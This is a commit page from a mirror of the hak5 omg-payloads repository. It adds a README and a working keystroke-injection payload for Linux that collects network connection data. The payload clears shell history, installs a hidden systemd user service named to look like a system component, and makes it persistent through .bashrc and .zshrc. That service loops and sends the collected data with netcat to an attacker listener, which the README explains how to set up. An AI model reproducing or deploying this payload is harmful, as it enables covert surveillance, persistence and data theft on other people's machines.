hak5
/
omg-payloads
mirror of https://github.com/hak5/omg-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

uploading network_surveillance payload 

network_surveillance payload exfiltrates network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.
pull/190/head
drapl0n 2023-07-09 19:58:03 +05:30 committed by GitHub
parent 868962cae9
commit 0981da652b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 55 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

33
payloads/library/exfiltration/network_surveillance/README.md Normal file
View File

@ -0,0 +1,33 @@
## About:
* Title: network_surveillance
* Description: network_surveillance payload exfiltrates network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Exfiltaration
* Target: Unix-like operating systems with systemd.
* Attackmodes: HID.
## network_surveillance: network_surveillance payload exfiltrates network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.
### Features:
* Exfiltrates network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.
* Fully Persistent.
* Waits for target to get online.
* Transfers loot once target is online.
* Oneliner payload.
### Workflow:
1. Extracts network information.
2. Creating Loot transfer mechanism in targets system.
3. Creating local systemd service for persistence.
4. Executing Autotart mechanism.
### Usage:
1. Run netcat listner on attacking machine: `nc -lvp <port number> > <output_filename>`
2. Example: `nc -lvp 4444 > network_surveillance.txt
### Changes to be made:
* Replace IP address(twice) `0.0.0.0` and Port Number `4444` on line `15`.
#### Support me if you like my work:
* https://twitter.com/drapl0n

22
payloads/library/exfiltration/network_surveillance/payload.txt Normal file
View File

@ -0,0 +1,22 @@
REM Title: network_surveillance
REM Description: network_surveillance payload exfiltrates network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.
REM AUTHOR: drapl0n
REM Version: 1.0
REM Category: Exfiltration.
REM Target: GNU/Linux.
REM Attackmodes: HID.
DELAY 2000
CTRL ALT t
DELAY 1000
STRING unset HISTFILE
ENTER
DELAY 200
STRING echo -e "#\!/bin/bash\nmkdir -p ~/.config/systemd/user\nmkdir -p /var/tmp/.system\nnetstat -antup >> /tmp/exfil\nnetstat -nlp >> /tmp/exfil\necho -e \"while :\\\ndo\\\n\\\tping -c 5 127.0.0.1\\\n\\\tif [ \\\$? -eq 0 ]; then\\\n\\\t\\\tnc -c 127.0.0.1 4444 < /tmp/exfil\\\n\\\tfi\\\ndone\" > /var/tmp/.system/systemBus\nchmod +x /var/tmp/.system/systemBus\necho -e \"[Unit]\\\nDescription= System BUS handler\\\n\\\n[Service]\\\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\\\nRestart=on-failure\\\nSuccessExitStatus=3 4\\\nRestartForceExitStatus=3 4\\\n\\\n[Install]\\\nWantedBy=default.target\" > ~/.config/systemd/user/systemBUS.service\nsystemctl --user enable --now systemBUS.service\nsystemctl --user start --now systemBUS.service\necho -e \"ls -a ~/ | grep 'zshrc' &> /dev/null\\\nif [ \\\$? = 0 ]; then\\\n\\\techo \"systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\\\nfi\\\nls -a ~/ | grep 'bashrc' &> /dev/null\\\nif [ \\\$? = 0 ]; then\\\n\\\techo \"systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\\\nfi\" > /tmp/tmmmp\nchmod +x /tmp/tmmmp && /tmp/./tmmmp && rm /tmp/tmmmp" > /tmp/system
ENTER
DELAY 200
STRING chmod +x /tmp/system
ENTER
DELAY 200
STRING /tmp/./system && rm /tmp/system && exit
ENTER